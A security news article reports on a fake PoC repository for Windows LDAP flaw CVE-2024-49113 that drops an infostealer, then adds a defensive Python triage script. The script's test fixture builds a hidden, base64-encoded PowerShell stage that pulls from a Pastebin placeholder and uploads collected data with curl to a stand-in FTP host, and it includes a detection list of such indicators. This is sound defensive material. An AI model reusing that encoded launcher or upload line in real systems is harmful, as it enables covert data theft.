Fake PoC Exploit Targets Security Researchers with Infostealer

Threat actors have created a fake proof-of-concept (PoC) exploit for a critical Microsoft vulnerability, designed to lure security researchers into downloading and executing information-stealing malware, Trend Micro has reported.

The fake PoC relates to a critical vulnerability in Microsoft's Windows Lightweight Directory Access Protocol (LDAP), for which a fix was released in the tech giant's December 2024 Patch Tuesday update.

CVE-2024-49113 is a denial-of-service (DoS) vulnerability that can be exploited to crash the LDAP service, leading to service disruptions.

Trend Micro reported that the attackers set up a malicious repository containing the fake PoC, which, upon execution, leads to sensitive computer and network information being exfiltrated.

This includes researchers’ computer information, process list, directory lists, network IPs, network adapters and installed updates.

PoC exploits are used in the security research community to demonstrate that a weakness is genuinely exploitable and to gauge the threat it poses to software, so that defenders can prioritise and address it.

“Although the tactic of using PoC lures as a vehicle for malware delivery is not new, this attack still poses significant concerns, especially since it capitalizes on a trending issue that could potentially affect a larger number of victims,” Trend Micro wrote.

How the PoC Lure Works

The malicious repository containing the PoC appears to be a fork from the original creator, the firm said.

The original Python files were replaced with an executable, poc.exe, packed with UPX. When a user runs it, a PowerShell script is dropped into the %Temp% folder and executed. That script creates a Scheduled Job, which in turn runs an encoded script.

Once decoded, that script downloads a further script from Pastebin, which collects the public IP address of the victim's machine and uploads it over FTP.

Computer and network data is then collected, compressed into a ZIP file and uploaded to an external FTP server using hardcoded credentials.

Security Researchers Warned to Be Vigilant

Trend Micro warned security researchers to be vigilant of fake PoC lures and to use the following best practices to avoid falling victim to this tactic:

  • Always download code, libraries and dependencies from official and trusted repositories
  • Be cautious of repositories with suspicious content that may seem out of place for the tool or application it is supposedly hosting
  • If possible, confirm the identity of the repository owner or organization
  • Review the repository’s commit history and recent changes for anomalies or signs of malicious activity
  • Be cautious of repositories with very few stars, forks or contributors, especially if they claim to be widely used
  • Look for reviews, issues or discussions about the repository to identify potential red flags
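As an added example (not code from the Trend Micro report or from the repository it describes), the following Python script turns the lure mechanics above and the checklist into a quick triage pass over a cloned repository before anything in it is run. It flags native binaries sitting where Python source should be, detects UPX packing from the PE section names, and decodes any PowerShell -EncodedCommand payloads so the Pastebin and FTP stages are visible in plaintext. The sample repository it builds, the placeholder URLs and the indicator strings are all constructed for illustration.

```python
"""Triage a cloned PoC repository for the red flags described above:
binaries replacing source, UPX-packed PE files, and encoded PowerShell."""
import base64
import binascii
import re
import struct
import tempfile
from pathlib import Path

# Assumptions for this example: which extensions count as native binaries in a
# repo that claims to be Python, and which strings in a decoded script are
# worth flagging. These are illustrative, not indicators from the report.
BINARY_EXTS = {".exe", ".dll", ".scr", ".com"}
SOURCE_EXTS = {".py", ".ps1", ".bat", ".cmd", ".txt", ".md"}
ENCODED_CMD_RE = re.compile(
    r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)
SUSPICIOUS = ("pastebin.com", "ftp://", "register-scheduledjob",
              "invoke-webrequest", "downloadstring")


def pe_section_names(data: bytes) -> list:
    """Return PE section names, or [] if the bytes are not a PE image."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return []
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0" or len(data) < e_lfanew + 24:
        return []
    (num_sections,) = struct.unpack_from("<H", data, e_lfanew + 6)
    (opt_size,) = struct.unpack_from("<H", data, e_lfanew + 20)
    table = e_lfanew + 24 + opt_size  # section table follows the optional header
    names = []
    for i in range(num_sections):
        raw = data[table + i * 40: table + i * 40 + 8]
        if len(raw) < 8:
            break
        names.append(raw.rstrip(b"\0").decode("ascii", "replace"))
    return names


def is_upx_packed(data: bytes) -> bool:
    """Stock UPX renames sections to UPX0/UPX1; a cheap but useful tell."""
    return any(n.startswith("UPX") for n in pe_section_names(data))


def decode_encoded_command(b64: str) -> str:
    """-EncodedCommand carries base64 of the UTF-16LE script text."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le", "replace")
    except (binascii.Error, ValueError):
        return ""


def make_encoded_command(script: str) -> str:
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def scan_repo(root: Path) -> list:
    """Return (relative_path, kind, detail) findings for a checked-out repo."""
    findings = []
    for path in sorted(p for p in root.rglob("*") if p.is_file()):
        rel = str(path.relative_to(root))
        data = path.read_bytes()
        if path.suffix.lower() in BINARY_EXTS or data[:2] == b"MZ":
            findings.append((rel, "binary-in-source-repo", path.suffix.lower()))
            if is_upx_packed(data):
                findings.append((rel, "upx-packed", ",".join(pe_section_names(data))))
            continue
        if path.suffix.lower() not in SOURCE_EXTS:
            continue
        text = data.decode("utf-8", "replace")
        for m in ENCODED_CMD_RE.finditer(text):
            decoded = decode_encoded_command(m.group(1)).lower()
            hits = [s for s in SUSPICIOUS if s in decoded]
            findings.append((rel, "encoded-powershell", ";".join(hits) or "(no known IOC)"))
        hits = [s for s in SUSPICIOUS if s in text.lower()]
        if hits:
            findings.append((rel, "suspicious-string", ";".join(hits)))
    return findings


def build_fake_upx_pe() -> bytes:
    """Constructed stand-in for a UPX-packed poc.exe: a minimal PE skeleton
    with UPX0/UPX1 section headers. It is not executable."""
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 64)  # e_lfanew = 64
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, 0, 0)
    sections = b"".join(n.ljust(8, b"\0") + b"\0" * 32 for n in (b"UPX0", b"UPX1"))
    return dos + coff + sections


def build_sample_repo() -> Path:
    """Constructed repo mirroring the lure: Python replaced by an .exe, plus a
    launcher with an encoded PowerShell stage. URLs are placeholders."""
    root = Path(tempfile.mkdtemp(prefix="fakepoc-"))
    (root / "README.md").write_text("# CVE-2024-49113 PoC\nRun poc.exe\n")
    (root / "poc.exe").write_bytes(build_fake_upx_pe())
    stage2 = ("$ip=(Invoke-WebRequest 'https://pastebin.com/raw/placeholder').Content;"
              "Register-ScheduledJob -Name upd -ScriptBlock "
              "{curl.exe -T info.zip ftp://example.invalid/}")
    (root / "run.ps1").write_text(
        "powershell.exe -NoP -W Hidden -EncodedCommand "
        + make_encoded_command(stage2) + "\n")
    return root


if __name__ == "__main__":
    for finding in scan_repo(build_sample_repo()):
        print(finding)
```

Run it on a real checkout by calling scan_repo(Path("path/to/clone")); any "binary-in-source-repo" or "encoded-powershell" finding in a repository that advertises itself as a Python PoC is reason to stop and read the commit history before going further. The section-name check only catches unmodified UPX; a repacked or custom packer needs a proper unpacker or sandbox, which is the point of running unknown PoCs only in an isolated VM.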
